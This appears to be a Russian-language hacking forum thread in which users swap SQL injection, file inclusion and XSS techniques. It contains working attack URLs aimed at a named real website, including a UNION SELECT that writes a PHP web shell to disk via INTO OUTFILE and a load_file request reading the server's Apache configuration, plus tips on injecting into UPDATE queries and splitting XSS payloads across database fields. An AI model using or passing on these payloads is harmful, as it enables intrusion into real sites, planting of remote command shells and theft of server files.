это вообще загадка....

$member = $row['name'];

епт.... иди на милворм, возьми пример, скачай уязвимую cms поставь на локалку, тести. а тк херли лясы точить?

Как можно использовать union select ... если запрос идет в UPDATE?

Тоесть например thx.

что за бд?

Если Oracle там можно использовать конструкции по типу
Update table set column=(select user from dual)

коротко:

File_Priv: Y
magic_quotes_off
Сервер:Apache/2.2.3 (Red Hat)
проблема: немогу раскрыть путь...

конструкция:
http://www.gsmtrack.nl/index.php?page[]=
недала нефига(

http://www.gsmtrack.nl/index.php?page=navi_merken&action=navigatie&id=-1+union+select+'%3C?php%20system($_GET['cmd']);%20?%3E'+into+outfile+'/var/www/'--

тут понятно тоже што нефига невыйшло так как путь.....

вообщем вся загвоздка в том што немогу путь раскрыть и (или) загрузить конфиги хотябы)...

прикол) я пробовал так...
http://www.gsmtrack.nl/index.php?page=navi_merken&action=navigatie&id=-1+union+select+load_file('/etc/httpd/conf/httpd.conf')/*
и у меня нераскрылось) спасибо!

но к сожалению
/opt/guide/www.gsmtrack.nl/HTML закрыт на запись из веба и /var/www/html тоже...

ты путь по конфигу вычислил?

Вопрос такой:
Windows. Xampp, Mysql
Php-inj include($file.".php")
Инклудить пхп файлы (конфиги) никакого эффекта не дает - они интерпретируются.
Инклудить логи не возможно - они настолько велики, что страница не успевает "показаться" за 600 секунд. (даже error.log)
И сам вопрос - чтоб такое проинклудить?!

Если allow_url_include, то
Если нет, то
Или автарки форумов, и тд...
Об этом уже писалось тут...

Есть 2 таблицы в бд с максимальным размером в 20 символов в каждой, вывод с них нефильтруеться т.е. если я в одну таблицу помешяю <script>alert('x')// а во 2 </script>
в итоге я получаю алерт а в сурсе я вижу такое
мож нает какой вариант прокатит в этом случае, придумал разбивать скрипт и коментить левое выходит примерно так:
но скрипт то невыполняеться при таких условиях